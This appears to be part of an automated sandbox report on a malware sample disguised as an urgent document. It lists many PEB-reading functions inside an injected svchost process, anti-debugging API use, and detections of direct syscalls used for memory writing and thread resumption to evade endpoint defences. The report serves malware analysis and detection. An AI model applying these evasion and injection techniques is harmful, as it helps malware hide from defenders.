                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376E5CF mov eax, dword ptr fs:[00000030h]4_2_0376E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037545B1 mov eax, dword ptr fs:[00000030h]4_2_037545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037545B1 mov eax, dword ptr fs:[00000030h]4_2_037545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B05A7 mov eax, dword ptr fs:[00000030h]4_2_037B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B05A7 mov eax, dword ptr fs:[00000030h]4_2_037B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B05A7 mov eax, dword ptr fs:[00000030h]4_2_037B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376E59C mov eax, dword ptr fs:[00000030h]4_2_0376E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03732582 mov eax, dword ptr fs:[00000030h]4_2_03732582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03732582 mov ecx, dword ptr fs:[00000030h]4_2_03732582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03764588 mov eax, dword ptr fs:[00000030h]4_2_03764588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0375A470 mov eax, dword ptr fs:[00000030h]4_2_0375A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0375A470 mov eax, dword ptr fs:[00000030h]4_2_0375A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0375A470 mov eax, dword ptr fs:[00000030h]4_2_0375A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037BC460 mov ecx, dword ptr fs:[00000030h]4_2_037BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037EA456 mov eax, dword ptr fs:[00000030h]4_2_037EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0372645D mov eax, dword ptr fs:[00000030h]4_2_0372645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0375245A mov eax, dword ptr fs:[00000030h]4_2_0375245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376E443 mov eax, dword ptr fs:[00000030h]4_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376E443 mov eax, dword ptr fs:[00000030h]4_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376E443 mov eax, dword ptr fs:[00000030h]4_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376E443 mov eax, dword ptr fs:[00000030h]4_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376E443 mov eax, dword ptr fs:[00000030h]4_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376E443 mov eax, dword ptr fs:[00000030h]4_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376E443 mov eax, dword ptr fs:[00000030h]4_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376E443 mov eax, dword ptr fs:[00000030h]4_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376A430 mov eax, dword ptr fs:[00000030h]4_2_0376A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0372E420 mov eax, dword ptr fs:[00000030h]4_2_0372E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0372E420 mov eax, dword ptr fs:[00000030h]4_2_0372E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0372E420 mov eax, dword ptr fs:[00000030h]4_2_0372E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0372C427 mov eax, dword ptr fs:[00000030h]4_2_0372C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B6420 mov eax, dword ptr fs:[00000030h]4_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B6420 mov eax, dword ptr fs:[00000030h]4_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B6420 mov eax, dword ptr fs:[00000030h]4_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B6420 mov eax, dword ptr fs:[00000030h]4_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B6420 mov eax, dword ptr fs:[00000030h]4_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B6420 mov eax, dword ptr fs:[00000030h]4_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B6420 mov eax, dword ptr fs:[00000030h]4_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03768402 mov eax, dword ptr fs:[00000030h]4_2_03768402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03768402 mov eax, dword ptr fs:[00000030h]4_2_03768402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03768402 mov eax, dword ptr fs:[00000030h]4_2_03768402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037304E5 mov ecx, dword ptr fs:[00000030h]4_2_037304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037644B0 mov ecx, dword ptr fs:[00000030h]4_2_037644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037BA4B0 mov eax, dword ptr fs:[00000030h]4_2_037BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037364AB mov eax, dword ptr fs:[00000030h]4_2_037364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037EA49A mov eax, dword ptr fs:[00000030h]4_2_037EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0372CB7E mov eax, dword ptr fs:[00000030h]4_2_0372CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037DEB50 mov eax, dword ptr fs:[00000030h]4_2_037DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037E4B4B mov eax, dword ptr fs:[00000030h]4_2_037E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037E4B4B mov eax, dword ptr fs:[00000030h]4_2_037E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037C6B40 mov eax, dword ptr fs:[00000030h]4_2_037C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037C6B40 mov eax, dword ptr fs:[00000030h]4_2_037C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037FAB40 mov eax, dword ptr fs:[00000030h]4_2_037FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037D8B42 mov eax, dword ptr fs:[00000030h]4_2_037D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0375EB20 mov eax, dword ptr fs:[00000030h]4_2_0375EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0375EB20 mov eax, dword ptr fs:[00000030h]4_2_0375EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037F8B28 mov eax, dword ptr fs:[00000030h]4_2_037F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037F8B28 mov eax, dword ptr fs:[00000030h]4_2_037F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037AEB1D mov eax, dword ptr fs:[00000030h]4_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037AEB1D mov eax, dword ptr fs:[00000030h]4_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037AEB1D mov eax, dword ptr fs:[00000030h]4_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037AEB1D mov eax, dword ptr fs:[00000030h]4_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037AEB1D mov eax, dword ptr fs:[00000030h]4_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037AEB1D mov eax, dword ptr fs:[00000030h]4_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037AEB1D mov eax, dword ptr fs:[00000030h]4_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037AEB1D mov eax, dword ptr fs:[00000030h]4_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037AEB1D mov eax, dword ptr fs:[00000030h]4_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03738BF0 mov eax, dword ptr fs:[00000030h]4_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03738BF0 mov eax, dword ptr fs:[00000030h]4_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03738BF0 mov eax, dword ptr fs:[00000030h]4_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0375EBFC mov eax, dword ptr fs:[00000030h]4_2_0375EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037BCBF0 mov eax, dword ptr fs:[00000030h]4_2_037BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037DEBD0 mov eax, dword ptr fs:[00000030h]4_2_037DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03750BCB mov eax, dword ptr fs:[00000030h]4_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03750BCB mov eax, dword ptr fs:[00000030h]4_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03750BCB mov eax, dword ptr fs:[00000030h]4_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03730BCD mov eax, dword ptr fs:[00000030h]4_2_03730BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03730BCD mov eax, dword ptr fs:[00000030h]4_2_03730BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03730BCD mov eax, dword ptr fs:[00000030h]4_2_03730BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03740BBE mov eax, dword ptr fs:[00000030h]4_2_03740BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03740BBE mov eax, dword ptr fs:[00000030h]4_2_03740BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037E4BB0 mov eax, dword ptr fs:[00000030h]4_2_037E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037E4BB0 mov eax, dword ptr fs:[00000030h]4_2_037E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03804A80 mov eax, dword ptr fs:[00000030h]4_2_03804A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037ACA72 mov eax, dword ptr fs:[00000030h]4_2_037ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037ACA72 mov eax, dword ptr fs:[00000030h]4_2_037ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376CA6F mov eax, dword ptr fs:[00000030h]4_2_0376CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376CA6F mov eax, dword ptr fs:[00000030h]4_2_0376CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376CA6F mov eax, dword ptr fs:[00000030h]4_2_0376CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037DEA60 mov eax, dword ptr fs:[00000030h]4_2_037DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03736A50 mov eax, dword ptr fs:[00000030h]4_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03736A50 mov eax, dword ptr fs:[00000030h]4_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03736A50 mov eax, dword ptr fs:[00000030h]4_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03736A50 mov eax, dword ptr fs:[00000030h]4_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03736A50 mov eax, dword ptr fs:[00000030h]4_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03736A50 mov eax, dword ptr fs:[00000030h]4_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03736A50 mov eax, dword ptr fs:[00000030h]4_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03740A5B mov eax, dword ptr fs:[00000030h]4_2_03740A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03740A5B mov eax, dword ptr fs:[00000030h]4_2_03740A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03754A35 mov eax, dword ptr fs:[00000030h]4_2_03754A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03754A35 mov eax, dword ptr fs:[00000030h]4_2_03754A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376CA38 mov eax, dword ptr fs:[00000030h]4_2_0376CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376CA24 mov eax, dword ptr fs:[00000030h]4_2_0376CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0375EA2E mov eax, dword ptr fs:[00000030h]4_2_0375EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037BCA11 mov eax, dword ptr fs:[00000030h]4_2_037BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376AAEE mov eax, dword ptr fs:[00000030h]4_2_0376AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376AAEE mov eax, dword ptr fs:[00000030h]4_2_0376AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03730AD0 mov eax, dword ptr fs:[00000030h]4_2_03730AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03764AD0 mov eax, dword ptr fs:[00000030h]4_2_03764AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03764AD0 mov eax, dword ptr fs:[00000030h]4_2_03764AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03786ACC mov eax, dword ptr fs:[00000030h]4_2_03786ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03786ACC mov eax, dword ptr fs:[00000030h]4_2_03786ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03786ACC mov eax, dword ptr fs:[00000030h]4_2_03786ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03738AA0 mov eax, dword ptr fs:[00000030h]4_2_03738AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03738AA0 mov eax, dword ptr fs:[00000030h]4_2_03738AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03786AA4 mov eax, dword ptr fs:[00000030h]4_2_03786AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03768A90 mov edx, dword ptr fs:[00000030h]4_2_03768A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0373EA80 mov eax, dword ptr fs:[00000030h]4_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0373EA80 mov eax, dword ptr fs:[00000030h]4_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0373EA80 mov eax, dword ptr fs:[00000030h]4_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0373EA80 mov eax, dword ptr fs:[00000030h]4_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0373EA80 mov eax, dword ptr fs:[00000030h]4_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0373EA80 mov eax, dword ptr fs:[00000030h]4_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0373EA80 mov eax, dword ptr fs:[00000030h]4_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0373EA80 mov eax, dword ptr fs:[00000030h]4_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0373EA80 mov eax, dword ptr fs:[00000030h]4_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037D4978 mov eax, dword ptr fs:[00000030h]4_2_037D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037D4978 mov eax, dword ptr fs:[00000030h]4_2_037D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037BC97C mov eax, dword ptr fs:[00000030h]4_2_037BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03756962 mov eax, dword ptr fs:[00000030h]4_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03756962 mov eax, dword ptr fs:[00000030h]4_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03756962 mov eax, dword ptr fs:[00000030h]4_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0377096E mov eax, dword ptr fs:[00000030h]4_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0377096E mov edx, dword ptr fs:[00000030h]4_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0377096E mov eax, dword ptr fs:[00000030h]4_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B0946 mov eax, dword ptr fs:[00000030h]4_2_037B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B892A mov eax, dword ptr fs:[00000030h]4_2_037B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037C892B mov eax, dword ptr fs:[00000030h]4_2_037C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037BC912 mov eax, dword ptr fs:[00000030h]4_2_037BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03728918 mov eax, dword ptr fs:[00000030h]4_2_03728918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03728918 mov eax, dword ptr fs:[00000030h]4_2_03728918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037AE908 mov eax, dword ptr fs:[00000030h]4_2_037AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037AE908 mov eax, dword ptr fs:[00000030h]4_2_037AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037629F9 mov eax, dword ptr fs:[00000030h]4_2_037629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037629F9 mov eax, dword ptr fs:[00000030h]4_2_037629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037BE9E0 mov eax, dword ptr fs:[00000030h]4_2_037BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0373A9D0 mov eax, dword ptr fs:[00000030h]4_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0373A9D0 mov eax, dword ptr fs:[00000030h]4_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0373A9D0 mov eax, dword ptr fs:[00000030h]4_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0373A9D0 mov eax, dword ptr fs:[00000030h]4_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0373A9D0 mov eax, dword ptr fs:[00000030h]4_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0373A9D0 mov eax, dword ptr fs:[00000030h]4_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037649D0 mov eax, dword ptr fs:[00000030h]4_2_037649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037FA9D3 mov eax, dword ptr fs:[00000030h]4_2_037FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037C69C0 mov eax, dword ptr fs:[00000030h]4_2_037C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B89B3 mov esi, dword ptr fs:[00000030h]4_2_037B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B89B3 mov eax, dword ptr fs:[00000030h]4_2_037B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B89B3 mov eax, dword ptr fs:[00000030h]4_2_037B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037429A0 mov eax, dword ptr fs:[00000030h]4_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037429A0 mov eax, dword ptr fs:[00000030h]4_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037429A0 mov eax, dword ptr fs:[00000030h]4_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037429A0 mov eax, dword ptr fs:[00000030h]4_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037429A0 mov eax, dword ptr fs:[00000030h]4_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037429A0 mov eax, dword ptr fs:[00000030h]4_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037429A0 mov eax, dword ptr fs:[00000030h]4_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037429A0 mov eax, dword ptr fs:[00000030h]4_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037429A0 mov eax, dword ptr fs:[00000030h]4_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037429A0 mov eax, dword ptr fs:[00000030h]4_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037429A0 mov eax, dword ptr fs:[00000030h]4_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037429A0 mov eax, dword ptr fs:[00000030h]4_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037429A0 mov eax, dword ptr fs:[00000030h]4_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037309AD mov eax, dword ptr fs:[00000030h]4_2_037309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037309AD mov eax, dword ptr fs:[00000030h]4_2_037309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037BE872 mov eax, dword ptr fs:[00000030h]4_2_037BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037BE872 mov eax, dword ptr fs:[00000030h]4_2_037BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037C6870 mov eax, dword ptr fs:[00000030h]4_2_037C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037C6870 mov eax, dword ptr fs:[00000030h]4_2_037C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03760854 mov eax, dword ptr fs:[00000030h]4_2_03760854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03734859 mov eax, dword ptr fs:[00000030h]4_2_03734859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03734859 mov eax, dword ptr fs:[00000030h]4_2_03734859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03742840 mov ecx, dword ptr fs:[00000030h]4_2_03742840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03752835 mov eax, dword ptr fs:[00000030h]4_2_03752835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03752835 mov eax, dword ptr fs:[00000030h]4_2_03752835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03752835 mov eax, dword ptr fs:[00000030h]4_2_03752835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03752835 mov ecx, dword ptr fs:[00000030h]4_2_03752835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03752835 mov eax, dword ptr fs:[00000030h]4_2_03752835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03752835 mov eax, dword ptr fs:[00000030h]4_2_03752835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376A830 mov eax, dword ptr fs:[00000030h]4_2_0376A830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037D483A mov eax, dword ptr fs:[00000030h]4_2_037D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037D483A mov eax, dword ptr fs:[00000030h]4_2_037D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037BC810 mov eax, dword ptr fs:[00000030h]4_2_037BC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376C8F9 mov eax, dword ptr fs:[00000030h]4_2_0376C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376C8F9 mov eax, dword ptr fs:[00000030h]4_2_0376C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037FA8E4 mov eax, dword ptr fs:[00000030h]4_2_037FA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0375E8C0 mov eax, dword ptr fs:[00000030h]4_2_0375E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037BC89D mov eax, dword ptr fs:[00000030h]4_2_037BC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03730887 mov eax, dword ptr fs:[00000030h]4_2_03730887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0375AF69 mov eax, dword ptr fs:[00000030h]4_2_0375AF69
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_004580A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_004580A9
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_0042A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A155
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_0042A124 SetUnhandledExceptionFilter,0_2_0042A124
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_016B1361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_016B1361
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_016B4C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_016B4C7B

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exeNtWriteVirtualMemory: Direct from: 0x77762E3CJump to behavior
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exeNtMapViewOfSection: Direct from: 0x77762D1CJump to behavior
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exeNtNotifyChangeKey: Direct from: 0x77763C2CJump to behavior
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exeNtCreateMutant: Direct from: 0x777635CCJump to behavior
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exeNtResumeThread: Direct from: 0x777636ACJump to behavior
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exeNtProtectVirtualMemory: Direct from: 0x77757B2EJump to behavior
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exeNtQuerySystemInformation: Direct from: 0x77762DFCJump to behavior
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exeNtAllocateVirtualMemory: Direct from: 0x77762BFCJump to behavior
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exeNtReadFile: Direct from: 0x77762ADCJump to behavior
